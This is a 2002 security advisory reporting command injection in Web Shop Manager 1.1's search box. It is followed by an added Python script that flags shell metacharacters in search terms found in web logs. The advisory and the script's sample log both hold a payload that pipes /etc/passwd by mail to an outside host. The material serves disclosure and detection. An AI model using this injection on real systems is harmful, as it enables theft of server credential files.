From: Tacettin Karadeniz (tacettinkaradeniz_at_yahoo.com)
Date: Thu Aug 15 2002 - 05:15:37 CDT


    Summary
    The Web Shop Manager
    (http://www.webscriptworld.com/scripts/wsm.phtml)
    allows you to manage a fully functional online store
    from a centralized web-based administration system. A
    security vulnerability in the product allows execution
    of arbitrary commands with the privileges of the
    script file used by the product.

    Details
    Vulnerable systems:
     * Web Shop Manager version 1.1

    Exploit:
    It is possible to send the server's password file to
    any mail address by writing the following command in
    Web Shop Manager's search box:

     |mail userhost.com < /etc/passwd

     

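An added example, not part of the original advisory or of the product's code: a log check that URL-decodes the search parameter in web server access logs and flags values containing characters a shell would interpret, such as the leading pipe shown above. The parameter name `search`, the script path `/cgi-bin/shop.cgi` and the log lines are constructed assumptions, since the advisory gives none of them.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters a shell (or a pipe-style file open) interprets instead of searching for.
SHELL_META = re.compile(r"[|;&`<>$\n]")

# Request portion of a Common Log Format line: "METHOD /path?query HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SEARCH_PARAM = "search"  # assumption: the advisory does not name the real parameter

# Constructed sample log lines (documentation addresses, hypothetical script path).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Aug/2002:05:01:00 -0500] '
    '"GET /cgi-bin/shop.cgi?search=blue+widget HTTP/1.0" 200 5120',
    '192.0.2.44 - - [15/Aug/2002:05:02:11 -0500] '
    '"GET /cgi-bin/shop.cgi?search=%7Cmail+userhost.com+%3C+%2Fetc%2Fpasswd HTTP/1.0" 200 312',
    '192.0.2.10 - - [15/Aug/2002:05:03:20 -0500] '
    '"GET /cgi-bin/shop.cgi?page=2&search=tea HTTP/1.0" 200 4800',
]


def suspicious_search_terms(log_lines, param=SEARCH_PARAM):
    """Return (line_number, decoded_term) for search values with shell metacharacters."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a parseable request line
        query = urlsplit(match.group(1)).query
        # parse_qs percent-decodes values and turns '+' into a space,
        # so %7C is seen as '|' just as the script would see it.
        for term in parse_qs(query, keep_blank_values=True).get(param, []):
            if SHELL_META.search(term):
                hits.append((number, term))
    return hits


if __name__ == "__main__":
    for number, term in suspicious_search_terms(SAMPLE_LOG):
        print(f"line {number}: suspicious search term {term!r}")
```

Access logs normally record only the query string, so a search submitted by POST will not appear here and needs request-body logging or a check inside the application itself.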